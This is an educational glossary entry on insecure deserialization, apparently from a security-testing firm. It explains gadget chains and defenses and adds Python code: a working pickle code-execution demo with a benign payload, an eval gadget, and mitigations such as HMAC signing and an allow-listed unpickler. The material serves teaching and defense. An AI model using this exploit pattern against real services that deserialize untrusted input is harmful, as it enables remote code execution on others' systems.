Glossary

Deserialization

The process of converting serialized data back into objects, which can be exploited if the input is untrusted.

Deserialization is the process of reconstructing an object from its serialized (stored or transmitted) form back into a live, usable object in memory. Serialization converts objects into a format suitable for storage or transmission (JSON, XML, or a language's native binary format), and deserialization reverses it. Insecure deserialization occurs when an application feeds data an attacker can influence to a deserializer that lets the data itself decide which classes are instantiated and how they are initialised. Validating fields after the fact does not help, because the damage happens during reconstruction: the attacker can execute arbitrary code, tamper with application state, or escalate privileges.

How It Works

Many languages ship native serialization mechanisms (Java's ObjectInputStream, PHP's unserialize(), Python's pickle, .NET's BinaryFormatter) that reconstruct complex objects, including their concrete types, fields, and references to other objects. Because each object's type is read from the stream rather than fixed by the application, whoever controls the stream decides which classes get instantiated. If any reachable class, in the application or its dependencies, does something dangerous in a hook the runtime invokes during deserialization or object teardown (Java's readObject and readResolve, PHP's __wakeup and __destruct, .NET's OnDeserialized callbacks; pickle goes further and lets the stream name any importable callable to invoke), the attacker can wire such classes together to reach code execution.

In Java, for example, an attacker can craft a serialized object that, when deserialized, triggers a sequence of method calls across multiple classes (called a gadget chain) that ultimately executes an arbitrary command. Similar attacks exist in PHP, Python, Ruby, and .NET. The attacker does not need to inject new code; they exploit existing classes in the application and its dependencies to construct a chain that achieves their objective.
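The mechanism described above, as an added example that is not from the original page: a Python pickle stream that makes the receiving process run an attacker-chosen program. pickle is used because it shows the whole chain in a few lines; Java, PHP, .NET and Ruby differ only in which hook fires. The names Gadget, build_payload, vulnerable_load and run_demo are this example's own, and the payload is constructed here so it runs offline.

```python
# Added example (not from the original page): a pickle stream that makes the
# victim run an attacker-chosen process. Names (Gadget, build_payload,
# vulnerable_load, run_demo) are this example's own.
import pickle
import subprocess
import sys


class Gadget:
    """Attacker-side class. __reduce__ tells pickle how to rebuild the object:
    'call subprocess.check_output with these arguments'. The stream stores
    only that instruction, so the victim never needs this class; it needs only
    the standard library, which every Python process already has."""

    def __init__(self, argv):
        self.argv = argv

    def __reduce__(self):
        return (subprocess.check_output, (self.argv,))


def build_payload(argv):
    """Attacker side: produce the bytes that will be sent to the victim."""
    return pickle.dumps(Gadget(argv))


def vulnerable_load(data: bytes):
    """Victim side: reconstructs 'an object' from untrusted bytes. What comes
    back is whatever the callable named in the stream returned."""
    return pickle.loads(data)


def run_demo() -> bytes:
    # Constructed payload: spawn a fresh interpreter that prints a marker. A
    # real attacker would name a shell and pass an arbitrary command instead.
    argv = [sys.executable, "-c", "print('attacker code ran in the victim process')"]
    payload = build_payload(argv)
    # The stream references the sink by module and name, never the Gadget class.
    assert b"Gadget" not in payload and b"check_output" in payload
    return vulnerable_load(payload)


if __name__ == "__main__":
    print(run_demo())
```

Note that the attacker never ships code: the stream names subprocess.check_output, a function that already exists in the victim, and pickle calls it. A Java gadget chain is the same idea with more steps, because ObjectInputStream will not call an arbitrary function directly, so the attacker has to find existing classes whose readObject methods, chained together, end in one that does.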

Even without achieving code execution, insecure deserialization can enable other attacks. Modifying serialized session data might allow privilege escalation. Tampering with serialized business objects might manipulate prices, quantities, or permissions. Injecting unexpected object types might cause crashes or reveal internal error information.

Why It Matters

Insecure deserialization frequently ends in remote code execution, the most severe vulnerability class; it had its own entry in the OWASP Top 10 (A8:2017) and now sits under Software and Data Integrity Failures (A08:2021). Security assessments map the attack surface by locating every input that reaches a deserializer. Native formats are the first targets: Java serialized objects (magic bytes AC ED 00 05, or rO0 when base64-encoded), PHP unserialize() strings, Python pickle, .NET BinaryFormatter. JSON and XML are not automatically safe, though: libraries configured to honour type hints in the data (Jackson default typing, Json.NET TypeNameHandling, java.beans.XMLDecoder) reintroduce the same problem. The recommended defense is not to deserialize untrusted data at all, or to use a data-only format whose parser can only produce plain values and containers, with the application rebuilding its own objects from those. Where a native format cannot be removed: restrict the classes the deserializer may instantiate (Java's ObjectInputFilter, a find_class allow-list for pickle), authenticate serialized blobs with an HMAC or signature so only data the server itself produced is accepted, and run the deserializing component with least privilege.
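The defenses listed above, and the session-tampering case from the "How It Works" section, as an added example that is not from the original page: a data-only format with explicit shape checks, HMAC integrity protection that catches an edited session before any deserializer sees it, and an allow-listed unpickler as a last resort. The names (load_session_json, sign_blob, verify_blob, tampering_detected, ALLOWED_GLOBALS, RestrictedUnpickler, restricted_loads, gadget_blocked) and the sample session are this example's own.

```python
# Added example (not from the original page): three defenses, in order of
# preference, for serialized data that crosses a trust boundary. All names
# and the sample session below are this example's own.
import hashlib
import hmac
import io
import json
import pickle
from collections import OrderedDict


# 1. Data-only format with explicit shape checks. JSON can yield only dicts,
#    lists, strings, numbers, booleans and null, so the parser never decides
#    which class to instantiate; the application rebuilds objects itself.
def load_session_json(text: str) -> dict:
    data = json.loads(text)
    if not isinstance(data, dict) or set(data) != {"user", "role"}:
        raise ValueError("unexpected session shape")
    if not isinstance(data["user"], str) or data["role"] not in ("user", "admin"):
        raise ValueError("unexpected session values")
    return data


# 2. Integrity protection: the server signs what it serialized, so a blob the
#    attacker edited (here, role flipped to admin) fails verification before
#    any deserializer runs. Tags are compared in constant time.
def sign_blob(blob: bytes, key: bytes) -> bytes:
    tag = hmac.new(key, blob, hashlib.sha256).hexdigest().encode()
    return blob + b"." + tag


def verify_blob(signed: bytes, key: bytes) -> bytes:
    blob, _, tag = signed.rpartition(b".")
    expected = hmac.new(key, blob, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed")
    return blob


def tampering_detected(key: bytes) -> bool:
    # Constructed session: issued for a normal user, then edited in transit.
    issued = sign_blob(json.dumps({"user": "alice", "role": "user"}).encode(), key)
    forged = issued.replace(b'"role": "user"', b'"role": "admin"')
    try:
        load_session_json(verify_blob(forged, key).decode())
    except ValueError:
        return True
    return False


# 3. Last resort when a native format cannot be removed: allow-list the
#    globals the stream may name. find_class resolves every class or function
#    reference in a pickle, so refusing unknown ones cuts off gadget chains.
#    (Java's ObjectInputFilter plays the same role for ObjectInputStream.)
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"{module}.{name} is not allowed")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class _Evil:
    """Constructed malicious object: asks the unpickler to call eval."""

    def __reduce__(self):
        return (eval, ("__import__('os').getpid()",))


def gadget_blocked() -> bool:
    """True if the allow-list refuses the eval gadget while still accepting
    an OrderedDict, the only global the list permits."""
    benign = restricted_loads(pickle.dumps(OrderedDict(a=1)))
    try:
        restricted_loads(pickle.dumps(_Evil()))
    except pickle.UnpicklingError:
        return benign == OrderedDict(a=1)
    return False
```

In production the HMAC key comes from a secrets store (for example secrets.token_bytes(32) generated once and kept server-side), never from the client. The allow-list approach is deliberately last: every entry is a class whose deserialization behaviour you now have to audit, and pickle still runs code paths in those classes, so it only narrows the problem rather than removing it.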

Need your application tested? Get in touch.
